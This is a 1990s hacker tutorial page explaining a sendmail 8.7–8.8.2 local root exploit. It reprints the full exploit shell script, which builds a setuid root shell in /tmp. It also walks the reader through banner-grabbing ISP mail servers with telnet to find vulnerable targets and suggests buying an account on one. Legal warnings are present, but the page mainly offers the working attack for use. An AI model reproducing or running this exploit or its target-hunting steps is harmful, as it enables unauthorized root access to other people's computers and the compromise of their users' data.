Shell Programming:
an Exploit Explained, continued...
AN EXPLOIT EXPLAINED
Here's a fun, simple,
powerful shell script. This is a goodie that you might be able
to use from your shell account to create a root shell for yourself
on the computer where you have your shell.
==========================================================
Newbie note: A "root shell" allows you to do anything
you wish to the computer you are on.
==========================================================
==========================================================
You can go to jail warning: In the US and many other countries,
it is illegal even to just get a root shell on someone else's
computer -- unless that person agrees to let you get root.
===========================================================
If
you are determined to test this shell script, there are ways
to do this legally. Number one, install some form of Unix
on your home computer. The easiest to install is Red Hat Linux,
available at http://www.redhat.com.
The easiest to get exploits to run on is Debian Linux, at http://www.debian.org.
For other Linux sources, see the GTMHH "Linux!" at
http://www.happyhacker.org.
(Note: the exploit below only someone from inside a shell account
for an ordinary user to get a root -- superuser -- sherll.)
Make sure your
Linux is running an outdated sendmail program, versions 8.7 through
8.8.2.
Next set up user
accounts on your home Linux box. The command is "adduser."
Then run this exploit
from your user account on your home computer. If you have
the right version of sendmail, you will be amazed at how easy
it is to break in.
The other way to
legally run this exploit is to get permission to break into someone
else's computer. Soon our Hacker Wargame will offer accounts
on a newbie computer that will allow this exploit.
Don't assume you
can get away with running this script against a stranger's computer.
There is no way to be absolutely certain you won't get caught.
Besides, if you have to read this to learn how to break into
a computer, you don't know enough to have even a hope of getting
away with the crime.
Once you try this
exploit you will know how ridiculously easy it is to break into
computers. If someone gets busted for breaking into a computer
using this shell script, yeah, sure, the media will make out
like the person who ran it is a genius. But you are about
to learn that a little kid could break into a computer that runs
a vulnerable version of sendmail. It's that easy.
So anyone who is in the know realizes that it doesn't take brains
to break into a computer. They will simply agree with Fatal
Error that "To err is human; to get caught is just plain
stupid."
Here is how to
break into a computer that runs sendmail 8.7 through 8.8.2 on
the Linux and FreeBSD operating systems.
1) Look for an Internet service provider running a vulnerable
version of sendmail. To do this, get the domain names of some
ISPs from http://www.celestin.com/pocia.
Another way to get ISP names is from people'semail addresses.
Then try telnetting
into their smtp (mail server) ports. Use the command:
telnet fubar.com smtp
Trying 208.999.37.180...
Connected to fubar.com (208.999.37.180).
Escape character is '^]'.
220 lobo.net ESMTP
Now there is a
smart ISP. They don't tell strangers what mail server program
they run. But pretty soon you will hit an ISP that is vulnerable.You
will get a message like this:
telnet foominds.com smtp
Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
220 zuni Sendmail SMI-8.7/SMI-SVR4 ready at Sun, 3 May 1998 14:43:07 -0700
OK, we have a vulnerable
version of sendmail. But does it also have a vulnerable
operating system? You can find that out by telneting into
the login:
telnet foominds.com
Trying 209.999.14.99...
Connected to foominds.com (209.999.14.99).
Escape character is '^]'.
UNIX(r) System V Release 4.0 (zuni)
login:
We struck out here
-- maybe. This exploit is guaranteed to work for Linux
and FreeBSD running vulnerable versions of sendmail. It
may or may not work on this ISP.
Let's say you find
an ISP where this exploit is certain to work. Your next
step is to buy an account on this ISP.
===========================================================
You can go to jail warning: The way I am showing you
to break into a computer is GUARANTEED to get you caught.
Don't do this unless you have first gotten permission to try
it out from the owner of your ISP. If you discover your
ISP is vulnerable, your best bet is not to break in. Instead,
politely tell tech support they are vulnerable, and offer to
show them how to break in. They might say "Yes, please
show us how it's done"! Then it will be OK to run
this script.
===========================================================
Now comes the fun
part. Give the command "pico s.sh" (or substitute
your favorite editor for "pico". That brings
up an editor program. Next, put in the following shell
commands:
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady ------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
"\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
echo "Now type: /tmp/sh"
More
shell programming --->>
